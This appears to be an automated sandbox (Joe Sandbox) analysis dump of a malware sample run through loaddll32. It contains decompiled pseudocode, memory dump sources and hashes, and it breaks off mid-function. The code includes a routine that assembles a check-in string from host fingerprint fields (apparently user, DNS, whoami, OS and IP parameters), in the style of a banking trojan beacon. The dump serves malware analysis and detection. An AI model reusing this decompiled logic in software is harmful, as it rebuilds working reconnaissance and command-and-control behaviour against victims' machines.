                                                  								__eflags =  *_t12;
                                                  							}
                                                  							_t91 = _t91 + 1;
                                                  							_t57 = _t57 + 0xc;
                                                  							__eflags = _t91 - _t102;
                                                  						} while (_t91 <= _t102);
                                                  						__eflags = _a4;
                                                  						if(_a4 == 0) {
                                                  							L15:
                                                  							_t81 =  *0x404178;
                                                  							_t110 = _t76 & 0xfffff000;
                                                  							_t58 = 0;
                                                  							__eflags = _t81;
                                                  							if(_t81 <= 0) {
                                                  								L18:
                                                  								_t104 = _t102 | 0xffffffff;
                                                  								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                  								__eflags = _t61;
                                                  								if(_t61 < 0) {
                                                  									_t62 = 0;
                                                  									__eflags = 0;
                                                  								} else {
                                                  									_t62 = _a4;
                                                  								}
                                                  								__eflags = _t62;
                                                  								if(_t62 == 0) {
                                                  									L59:
                                                  									_t63 = _t104;
                                                  									goto L60;
                                                  								} else {
                                                  									__eflags = _v12 - 0x1000000;
                                                  									if(_v12 != 0x1000000) {
                                                  										goto L59;
                                                  									}
                                                  									__eflags = _v16 & 0x000000cc;
                                                  									if((_v16 & 0x000000cc) == 0) {
                                                  										L46:
                                                  										_t63 = 1;
                                                  										 *0x4041c0 = 1;
                                                  										__eflags =  *0x4041c0;
                                                  										if( *0x4041c0 != 0) {
                                                  											goto L60;
                                                  										}
                                                  										_t84 =  *0x404178;
                                                  										__eflags = _t84;
                                                  										_t93 = _t84;
                                                  										if(_t84 <= 0) {
                                                  											L51:
                                                  											__eflags = _t93;
                                                  											if(_t93 != 0) {
                                                  												L58:
                                                  												 *0x4041c0 = 0;
                                                  												goto L5;
                                                  											}
                                                  											_t77 = 0xf;
                                                  											__eflags = _t84 - _t77;
                                                  											if(_t84 <= _t77) {
                                                  												_t77 = _t84;
                                                  											}
                                                  											_t94 = 0;
                                                  											__eflags = _t77;
                                                  											if(_t77 < 0) {
                                                  												L56:
                                                  												__eflags = _t84 - 0x10;
                                                  												if(_t84 < 0x10) {
                                                  													_t86 = _t84 + 1;
                                                  													__eflags = _t86;
                                                  													 *0x404178 = _t86;
                                                  												}
                                                  												goto L58;
                                                  											} else {
                                                  												do {
                                                  													_t68 = 0x404180 + _t94 * 4;
                                                  													_t94 = _t94 + 1;
                                                  													__eflags = _t94 - _t77;
                                                  													 *_t68 = _t110;
                                                  													_t110 =  *_t68;
                                                  												} while (_t94 <= _t77);
                                                  												goto L56;
                                                  											}
                                                  										}
                                                  										_t69 = 0x40417c + _t84 * 4;
                                                  										while(1) {
                                                  											__eflags =  *_t69 - _t110;
                                                  											if( *_t69 == _t110) {
                                                  												goto L51;
                                                  											}
                                                  											_t93 = _t93 - 1;
                                                  											_t69 = _t69 - 4;
                                                  											__eflags = _t93;
                                                  											if(_t93 > 0) {
                                                  												continue;
                                                  											}
                                                  											goto L51;
                                                  										}
                                                  										goto L51;
                                                  									}
                                                  									_t87 = _v32;
                                                  									__eflags =  *_t87 - 0x5a4d;
                                                  									if( *_t87 != 0x5a4d) {
                                                  										goto L59;
                                                  									}
                                                  									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                  									__eflags =  *_t71 - 0x4550;
                                                  									if( *_t71 != 0x4550) {
                                                  										goto L59;
                                                  									}
                                                  									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                  									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                  										goto L59;
                                                  									}
                                                  									_t78 = _t76 - _t87;
                                                  									__eflags =  *((short*)(_t71 + 6));
                                                  									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                  									if( *((short*)(_t71 + 6)) <= 0) {
                                                  										goto L59;
                                                  									}
                                                  									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                  									__eflags = _t78 - _t72;
                                                  									if(_t78 < _t72) {
                                                  										goto L46;
                                                  									}
                                                  									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                  									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                  										goto L46;
                                                  									}
                                                  									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                  									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                  										goto L20;
                                                  									}
                                                  									goto L46;
                                                  								}
                                                  							} else {
                                                  								goto L16;
                                                  							}
                                                  							while(1) {
                                                  								L16:
                                                  								__eflags =  *((intOrPtr*)(0x404180 + _t58 * 4)) - _t110;
                                                  								if( *((intOrPtr*)(0x404180 + _t58 * 4)) == _t110) {
                                                  									break;
                                                  								}
                                                  								_t58 = _t58 + 1;
                                                  								__eflags = _t58 - _t81;
                                                  								if(_t58 < _t81) {
                                                  									continue;
                                                  								}
                                                  								goto L18;
                                                  							}
                                                  							__eflags = _t58;
                                                  							if(_t58 <= 0) {
                                                  								goto L5;
                                                  							}
                                                  							 *0x4041c0 = 1;
                                                  							__eflags =  *0x4041c0;
                                                  							if( *0x4041c0 != 0) {
                                                  								goto L5;
                                                  							}
                                                  							__eflags =  *((intOrPtr*)(0x404180 + _t58 * 4)) - _t110;
                                                  							if( *((intOrPtr*)(0x404180 + _t58 * 4)) == _t110) {
                                                  								L32:
                                                  								_t100 = 0;
                                                  								__eflags = _t58;
                                                  								if(_t58 < 0) {
                                                  									L34:
                                                  									 *0x4041c0 = 0;
                                                  									goto L5;
                                                  								} else {
                                                  									goto L33;
                                                  								}
                                                  								do {
                                                  									L33:
                                                  									_t90 = 0x404180 + _t100 * 4;
                                                  									_t100 = _t100 + 1;
                                                  									__eflags = _t100 - _t58;
                                                  									 *_t90 = _t110;
                                                  									_t110 =  *_t90;
                                                  								} while (_t100 <= _t58);
                                                  								goto L34;
                                                  							}
                                                  							_t58 = _t81 - 1;
                                                  							__eflags = _t58;
                                                  							if(_t58 < 0) {
                                                  								L28:
                                                  								__eflags = _t81 - 0x10;
                                                  								if(_t81 < 0x10) {
                                                  									_t81 = _t81 + 1;
                                                  									__eflags = _t81;
                                                  									 *0x404178 = _t81;
                                                  								}
                                                  								_t58 = _t81 - 1;
                                                  								goto L32;
                                                  							} else {
                                                  								goto L25;
                                                  							}
                                                  							while(1) {
                                                  								L25:
                                                  								__eflags =  *((intOrPtr*)(0x404180 + _t58 * 4)) - _t110;
                                                  								if( *((intOrPtr*)(0x404180 + _t58 * 4)) == _t110) {
                                                  									break;
                                                  								}
                                                  								_t58 = _t58 - 1;
                                                  								__eflags = _t58;
                                                  								if(_t58 >= 0) {
                                                  									continue;
                                                  								}
                                                  								break;
                                                  							}
                                                  							__eflags = _t58;
                                                  							if(__eflags >= 0) {
                                                  								if(__eflags == 0) {
                                                  									goto L34;
                                                  								}
                                                  								goto L32;
                                                  							}
                                                  							goto L28;
                                                  						}
                                                  						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                  						__eflags = _t75 - _v8;
                                                  						if(_t75 < _v8) {
                                                  							goto L20;
                                                  						}
                                                  						__eflags = _t75 - _t108;
                                                  						if(_t75 >= _t108) {
                                                  							goto L20;
                                                  						}
                                                  						goto L15;
                                                  					}
                                                  					L5:
                                                  					_t63 = 1;
                                                  					goto L60;
                                                  				} else {
                                                  					goto L3;
                                                  				}
                                                  			}

                                                  Instruction address column for the listing above (spilled out of the two-column layout; only the range survives): 0x0040237f to 0x00402592

                                                  APIs
                                                  • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00402426
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MemoryQueryVirtual
                                                  • String ID:
                                                  • API String ID: 2850889275-0
                                                  • Opcode ID: 626958346fd60cabf43f0ddbfab11c40b5535eb766f8715f11b79e1d1ab16b9d
                                                  • Instruction ID: 8a986e9dcfd0441aff0562b3517ea09b8d901034ce7e192845dbb0a1bddafc0a
                                                  • Opcode Fuzzy Hash: 626958346fd60cabf43f0ddbfab11c40b5535eb766f8715f11b79e1d1ab16b9d
                                                  • Instruction Fuzzy Hash: DE61D870600612ABDB19CF29DB9C66A73A5EB95314F24843BDD16F72D1E3BCDC82864C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647167015.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e40000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: t32c
                                                  • API String ID: 0-3674199949
                                                  • Opcode ID: 117cca6488b6fc0c7e92642179208c921f760515844708eca5546562275beb59
                                                  • Instruction ID: 1202544c357470b42bd8f8e04c488136261f4a22cb15c3bfd0d55d6bc225d37f
                                                  • Opcode Fuzzy Hash: 117cca6488b6fc0c7e92642179208c921f760515844708eca5546562275beb59
                                                  • Instruction Fuzzy Hash: E141487290021ADFDF20CF44E984BA9B7B5FB88314F15A5A4DA096B216D334EE85DF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647167015.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e40000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: t32c
                                                  • API String ID: 0-3674199949
                                                  • Opcode ID: 00dd7a5faeabe48c389b561aad31ca083426c29c9d9185e8d49efe1a840d490a
                                                  • Instruction ID: 5a0aea57036d48ec70e84ba06489dcf31188a1f1d4cace1f1e860c839fa412a6
                                                  • Opcode Fuzzy Hash: 00dd7a5faeabe48c389b561aad31ca083426c29c9d9185e8d49efe1a840d490a
                                                  • Instruction Fuzzy Hash: F7414A76A00215DFDB20DF94DD80BA9B7B5FF88724F1895A4DA196B246D334EE80CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647167015.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e40000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: t32c
                                                  • API String ID: 0-3674199949
                                                  • Opcode ID: b5d9ae38fa2fbbcf26086a426b665ed40a8c77386611467cddef06e959dbe1d3
                                                  • Instruction ID: ff94a28a48cc7800ac38137fd2c54a39792edba74a99b4882fbc5aec7c939cc4
                                                  • Opcode Fuzzy Hash: b5d9ae38fa2fbbcf26086a426b665ed40a8c77386611467cddef06e959dbe1d3
                                                  • Instruction Fuzzy Hash: 4A317C76900219DFDF20DF44ED80BA9B7B1FB88324F14A5A4DA096B216D334EE81CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 71%
                                                  			E00ECB11C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                  				intOrPtr _v8;
                                                  				char _v12;
                                                  				void* __ebp;
                                                  				signed int* _t43;
                                                  				char _t44;
                                                  				void* _t46;
                                                  				void* _t49;
                                                  				intOrPtr* _t53;
                                                  				void* _t54;
                                                  				void* _t65;
                                                  				long _t66;
                                                  				signed int* _t80;
                                                  				signed int* _t82;
                                                  				void* _t84;
                                                  				signed int _t86;
                                                  				void* _t89;
                                                  				void* _t95;
                                                  				void* _t96;
                                                  				void* _t99;
                                                  				void* _t106;
                                                  
                                                  				_t43 = _t84;
                                                  				_t65 = __ebx + 2;
                                                  				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                  				_t89 = _t95;
                                                  				_t96 = _t95 - 8;
                                                  				_push(_t65);
                                                  				_push(_t84);
                                                  				_push(_t89);
                                                  				asm("cld");
                                                  				_t66 = _a8;
                                                  				_t44 = _a4;
                                                  				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                  					_push(_t89);
                                                  					E00ECB287(_t66 + 0x10, _t66, 0xffffffff);
                                                  					_t46 = 1;
                                                  				} else {
                                                  					_v12 = _t44;
                                                  					_v8 = _a12;
                                                  					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                  					_t86 =  *(_t66 + 0xc);
                                                  					_t80 =  *(_t66 + 8);
                                                  					_t49 = E00ECB341(_t66);
                                                  					_t99 = _t96 + 4;
                                                  					if(_t49 == 0) {
                                                  						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                  						goto L11;
                                                  					} else {
                                                  						while(_t86 != 0xffffffff) {
                                                  							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                  							if(_t53 == 0) {
                                                  								L8:
                                                  								_t80 =  *(_t66 + 8);
                                                  								_t86 = _t80[_t86 + _t86 * 2];
                                                  								continue;
                                                  							} else {
                                                  								_t54 =  *_t53();
                                                  								_t89 = _t89;
                                                  								_t86 = _t86;
                                                  								_t66 = _a8;
                                                  								_t55 = _t54;
                                                  								_t106 = _t54;
                                                  								if(_t106 == 0) {
                                                  									goto L8;
                                                  								} else {
                                                  									if(_t106 < 0) {
                                                  										_t46 = 0;
                                                  									} else {
                                                  										_t82 =  *(_t66 + 8);
                                                  										E00ECB22C(_t55, _t66);
                                                  										_t89 = _t66 + 0x10;
                                                  										E00ECB287(_t89, _t66, 0);
                                                  										_t99 = _t99 + 0xc;
                                                  										E00ECB323(_t82[2]);
                                                  										 *(_t66 + 0xc) =  *_t82;
                                                  										_t66 = 0;
                                                  										_t86 = 0;
                                                  										 *(_t82[2])(1);
                                                  										goto L8;
                                                  									}
                                                  								}
                                                  							}
                                                  							goto L13;
                                                  						}
                                                  						L11:
                                                  						_t46 = 1;
                                                  					}
                                                  				}
                                                  				L13:
                                                  				return _t46;
                                                  			}

                                                  0x00ecb120
                                                  0x00ecb121
                                                  0x00ecb122
                                                  0x00ecb125
                                                  0x00ecb127
                                                  0x00ecb12a
                                                  0x00ecb12b
                                                  0x00ecb12d
                                                  0x00ecb12e
                                                  0x00ecb12f
                                                  0x00ecb132
                                                  0x00ecb13c
                                                  0x00ecb1ed
                                                  0x00ecb1f4
                                                  0x00ecb1fd
                                                  0x00ecb142
                                                  0x00ecb142
                                                  0x00ecb148
                                                  0x00ecb14e
                                                  0x00ecb151
                                                  0x00ecb154
                                                  0x00ecb158
                                                  0x00ecb15d
                                                  0x00ecb162
                                                  0x00ecb1e2
                                                  0x00000000
                                                  0x00ecb164
                                                  0x00ecb164
                                                  0x00ecb170
                                                  0x00ecb172
                                                  0x00ecb1cd
                                                  0x00ecb1cd
                                                  0x00ecb1d3
                                                  0x00000000
                                                  0x00ecb174
                                                  0x00ecb183
                                                  0x00ecb185
                                                  0x00ecb186
                                                  0x00ecb187
                                                  0x00ecb18a
                                                  0x00ecb18a
                                                  0x00ecb18c
                                                  0x00000000
                                                  0x00ecb18e
                                                  0x00ecb18e
                                                  0x00ecb1d8
                                                  0x00ecb190
                                                  0x00ecb190
                                                  0x00ecb194
                                                  0x00ecb19c
                                                  0x00ecb1a1
                                                  0x00ecb1a6
                                                  0x00ecb1b2
                                                  0x00ecb1ba
                                                  0x00ecb1c1
                                                  0x00ecb1c7
                                                  0x00ecb1cb
                                                  0x00000000
                                                  0x00ecb1cb
                                                  0x00ecb18e
                                                  0x00ecb18c
                                                  0x00000000
                                                  0x00ecb172
                                                  0x00ecb1e6
                                                  0x00ecb1e6
                                                  0x00ecb1e6
                                                  0x00ecb162
                                                  0x00ecb202
                                                  0x00ecb209

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                  • Instruction ID: 8727ac3b4ad56e3268332d23308f7ca64fa1d2b154fd533cd9db482e66a918b5
                                                  • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                  • Instruction Fuzzy Hash: 3A21E2329012149BCB14DF68C892EABBBA5FF44350F49806CE855EB245D731FA16CBE0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 71%
                                                  			E00402154(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                  				intOrPtr _v8;
                                                  				char _v12;
                                                  				void* __ebp;
                                                  				signed int* _t43;
                                                  				char _t44;
                                                  				void* _t46;
                                                  				void* _t49;
                                                  				intOrPtr* _t53;
                                                  				void* _t54;
                                                  				void* _t65;
                                                  				long _t66;
                                                  				signed int* _t80;
                                                  				signed int* _t82;
                                                  				void* _t84;
                                                  				signed int _t86;
                                                  				void* _t89;
                                                  				void* _t95;
                                                  				void* _t96;
                                                  				void* _t99;
                                                  				void* _t106;
                                                  
                                                  				_t43 = _t84;
                                                  				_t65 = __ebx + 2;
                                                  				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                  				_t89 = _t95;
                                                  				_t96 = _t95 - 8;
                                                  				_push(_t65);
                                                  				_push(_t84);
                                                  				_push(_t89);
                                                  				asm("cld");
                                                  				_t66 = _a8;
                                                  				_t44 = _a4;
                                                  				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                  					_push(_t89);
                                                  					E004022BB(_t66 + 0x10, _t66, 0xffffffff);
                                                  					_t46 = 1;
                                                  				} else {
                                                  					_v12 = _t44;
                                                  					_v8 = _a12;
                                                  					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                  					_t86 =  *(_t66 + 0xc);
                                                  					_t80 =  *(_t66 + 8);
                                                  					_t49 = E00402375(_t66);
                                                  					_t99 = _t96 + 4;
                                                  					if(_t49 == 0) {
                                                  						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                  						goto L11;
                                                  					} else {
                                                  						while(_t86 != 0xffffffff) {
                                                  							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                  							if(_t53 == 0) {
                                                  								L8:
                                                  								_t80 =  *(_t66 + 8);
                                                  								_t86 = _t80[_t86 + _t86 * 2];
                                                  								continue;
                                                  							} else {
                                                  								_t54 =  *_t53();
                                                  								_t89 = _t89;
                                                  								_t86 = _t86;
                                                  								_t66 = _a8;
                                                  								_t55 = _t54;
                                                  								_t106 = _t54;
                                                  								if(_t106 == 0) {
                                                  									goto L8;
                                                  								} else {
                                                  									if(_t106 < 0) {
                                                  										_t46 = 0;
                                                  									} else {
                                                  										_t82 =  *(_t66 + 8);
                                                  										E00402260(_t55, _t66);
                                                  										_t89 = _t66 + 0x10;
                                                  										E004022BB(_t89, _t66, 0);
                                                  										_t99 = _t99 + 0xc;
                                                  										E00402357(_t82[2], 1);
                                                  										 *(_t66 + 0xc) =  *_t82;
                                                  										_t66 = 0;
                                                  										_t86 = 0;
                                                  										 *(_t82[2])();
                                                  										goto L8;
                                                  									}
                                                  								}
                                                  							}
                                                  							goto L13;
                                                  						}
                                                  						L11:
                                                  						_t46 = 1;
                                                  					}
                                                  				}
                                                  				L13:
                                                  				return _t46;
                                                  			}

                                                  0x00402158
                                                  0x00402159
                                                  0x0040215a
                                                  0x0040215d
                                                  0x0040215f
                                                  0x00402162
                                                  0x00402163
                                                  0x00402165
                                                  0x00402166
                                                  0x00402167
                                                  0x0040216a
                                                  0x00402174
                                                  0x00402225
                                                  0x0040222c
                                                  0x00402235
                                                  0x0040217a
                                                  0x0040217a
                                                  0x00402180
                                                  0x00402186
                                                  0x00402189
                                                  0x0040218c
                                                  0x00402190
                                                  0x00402195
                                                  0x0040219a
                                                  0x0040221a
                                                  0x00000000
                                                  0x0040219c
                                                  0x0040219c
                                                  0x004021a8
                                                  0x004021aa
                                                  0x00402205
                                                  0x00402205
                                                  0x0040220b
                                                  0x00000000
                                                  0x004021ac
                                                  0x004021bb
                                                  0x004021bd
                                                  0x004021be
                                                  0x004021bf
                                                  0x004021c2
                                                  0x004021c2
                                                  0x004021c4
                                                  0x00000000
                                                  0x004021c6
                                                  0x004021c6
                                                  0x00402210
                                                  0x004021c8
                                                  0x004021c8
                                                  0x004021cc
                                                  0x004021d4
                                                  0x004021d9
                                                  0x004021de
                                                  0x004021ea
                                                  0x004021f2
                                                  0x004021f9
                                                  0x004021ff
                                                  0x00402203
                                                  0x00000000
                                                  0x00402203
                                                  0x004021c6
                                                  0x004021c4
                                                  0x00000000
                                                  0x004021aa
                                                  0x0040221e
                                                  0x0040221e
                                                  0x0040221e
                                                  0x0040219a
                                                  0x0040223a
                                                  0x00402241

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                  • Instruction ID: 991b6e347445fc6bdfd9f5c6b66579e94d9d23a965324a07e0cc5b9e4db4a249
                                                  • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                  • Instruction Fuzzy Hash: 1421C7329002049BCB14DFA9C9C8967B7A5BF49310B4680ADDD19AB2C5D774FA15CBE0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647167015.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e40000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a927edfd22bb6a87c59e064a0d897be9f8ff1fc4e048460ef94ea895cfa2374a
                                                  • Instruction ID: 059581c573e862f4b8ee63126a68fb17cb25446cf25fa26084240c671de4b550
                                                  • Opcode Fuzzy Hash: a927edfd22bb6a87c59e064a0d897be9f8ff1fc4e048460ef94ea895cfa2374a
                                                  • Instruction Fuzzy Hash: E2E0B6B1901119AEEF15CA54CC48FAAB7BDEBC8700F1081D5E60CAA150D2309E808F60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647167015.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e40000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 64181d5a1a0adb3b83a868520eb234369a1b34ebae05e35cc0e8b6d16c9ba115
                                                  • Instruction ID: 3181798b8552b92ef0a32780970849921aa2b8a1ace5e7549d6e07fef26dc94e
                                                  • Opcode Fuzzy Hash: 64181d5a1a0adb3b83a868520eb234369a1b34ebae05e35cc0e8b6d16c9ba115
                                                  • Instruction Fuzzy Hash: 95D09235E0016A9BCF20EA60CA5879EF3B6EB9D314F1500D8C60C3735087342E86CE40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 66%
                                                  			E00ECA279(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                                  				intOrPtr _v0;
                                                  				intOrPtr _v4;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v24;
                                                  				intOrPtr _v28;
                                                  				void* _v44;
                                                  				intOrPtr _v52;
                                                  				void* __edi;
                                                  				long _t25;
                                                  				intOrPtr _t26;
                                                  				intOrPtr _t27;
                                                  				intOrPtr _t28;
                                                  				intOrPtr _t29;
                                                  				intOrPtr _t30;
                                                  				void* _t33;
                                                  				intOrPtr _t34;
                                                  				int _t37;
                                                  				intOrPtr _t42;
                                                  				intOrPtr _t43;
                                                  				intOrPtr _t50;
                                                  				intOrPtr _t54;
                                                  				intOrPtr* _t56;
                                                  				intOrPtr _t62;
                                                  				intOrPtr _t68;
                                                  				intOrPtr _t71;
                                                  				intOrPtr _t74;
                                                  				int _t77;
                                                  				intOrPtr _t78;
                                                  				int _t81;
                                                  				intOrPtr _t83;
                                                  				int _t86;
                                                  				intOrPtr* _t89;
                                                  				intOrPtr* _t90;
                                                  				void* _t91;
                                                  				void* _t95;
                                                  				void* _t96;
                                                  				void* _t97;
                                                  				intOrPtr _t98;
                                                  				void* _t100;
                                                  				int _t101;
                                                  				void* _t102;
                                                  				void* _t103;
                                                  				void* _t105;
                                                  				void* _t106;
                                                  				void* _t108;
                                                  
                                                  				_t95 = __edx;
                                                  				_t91 = __ecx;
                                                  				_t25 = __eax;
                                                  				_t105 = _a16;
                                                  				_v4 = 8;
                                                  				if(__eax == 0) {
                                                  					_t25 = GetTickCount();
                                                  				}
                                                  				_t26 =  *0xecd018; // 0xf56cfa1f
                                                  				asm("bswap eax");
                                                  				_t27 =  *0xecd014; // 0x3a87c8cd
                                                  				asm("bswap eax");
                                                  				_t28 =  *0xecd010; // 0xd8d2f808
                                                  				asm("bswap eax");
                                                  				_t29 =  *0xecd00c; // 0x8f8f86c2
                                                  				asm("bswap eax");
                                                  				_t30 =  *0xecd27c; // 0x213a5a8
                                                  				_t3 = _t30 + 0xece633; // 0x74666f73
                                                  				_t101 = wsprintfA(_t105, _t3, 2, 0x3d14b, _t29, _t28, _t27, _t26,  *0xecd02c,  *0xecd004, _t25);
                                                  				_t33 = E00EC1C1A();
                                                  				_t34 =  *0xecd27c; // 0x213a5a8
                                                  				_t4 = _t34 + 0xece673; // 0x74707526
                                                  				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                                  				_t108 = _t106 + 0x38;
                                                  				_t102 = _t101 + _t37;
                                                  				_t96 = E00EC54BC(_t91);
                                                  				if(_t96 != 0) {
                                                  					_t83 =  *0xecd27c; // 0x213a5a8
                                                  					_t6 = _t83 + 0xece8eb; // 0x736e6426
                                                  					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                                  					_t108 = _t108 + 0xc;
                                                  					_t102 = _t102 + _t86;
                                                  					HeapFree( *0xecd238, 0, _t96);
                                                  				}
                                                  				_t97 = E00EC7649();
                                                  				if(_t97 != 0) {
                                                  					_t78 =  *0xecd27c; // 0x213a5a8
                                                  					_t8 = _t78 + 0xece8f3; // 0x6f687726
                                                  					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                                  					_t108 = _t108 + 0xc;
                                                  					_t102 = _t102 + _t81;
                                                  					HeapFree( *0xecd238, 0, _t97);
                                                  				}
                                                  				_t98 =  *0xecd32c; // 0x30095b0
                                                  				_a32 = E00EC9395(0xecd00a, _t98 + 4);
                                                  				_t42 =  *0xecd2cc; // 0x0
                                                  				if(_t42 != 0) {
                                                  					_t74 =  *0xecd27c; // 0x213a5a8
                                                  					_t11 = _t74 + 0xece8cd; // 0x3d736f26
                                                  					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                                  					_t108 = _t108 + 0xc;
                                                  					_t102 = _t102 + _t77;
                                                  				}
                                                  				_t43 =  *0xecd2c8; // 0x0
                                                  				if(_t43 != 0) {
                                                  					_t71 =  *0xecd27c; // 0x213a5a8
                                                  					_t13 = _t71 + 0xece8c6; // 0x3d706926
                                                  					wsprintfA(_t102 + _t105, _t13, _t43);
                                                  				}
                                                  				if(_a32 != 0) {
                                                  					_t100 = RtlAllocateHeap( *0xecd238, 0, 0x800);
                                                  					if(_t100 != 0) {
                                                  						E00EC7A80(GetTickCount());
                                                  						_t50 =  *0xecd32c; // 0x30095b0
                                                  						__imp__(_t50 + 0x40);
                                                  						asm("lock xadd [eax], ecx");
                                                  						_t54 =  *0xecd32c; // 0x30095b0
                                                  						__imp__(_t54 + 0x40);
                                                  						_t56 =  *0xecd32c; // 0x30095b0
                                                  						_t103 = E00EC8307(1, _t95, _t105,  *_t56);
                                                  						asm("lock xadd [eax], ecx");
                                                  						if(_t103 != 0) {
                                                  							StrTrimA(_t103, 0xecc2ac);
                                                  							_push(_t103);
                                                  							_t62 = E00EC3CC8();
                                                  							_v16 = _t62;
                                                  							if(_t62 != 0) {
                                                  								_t89 = __imp__;
                                                  								 *_t89(_t103, _v0);
                                                  								 *_t89(_t100, _a4);
                                                  								_t90 = __imp__;
                                                  								 *_t90(_t100, _v28);
                                                  								 *_t90(_t100, _t103);
                                                  								_t68 = E00EC1199(0xffffffffffffffff, _t100, _v28, _v24);
                                                  								_v52 = _t68;
                                                  								if(_t68 != 0 && _t68 != 0x10d2) {
                                                  									E00ECA1B0();
                                                  								}
                                                  								HeapFree( *0xecd238, 0, _v44);
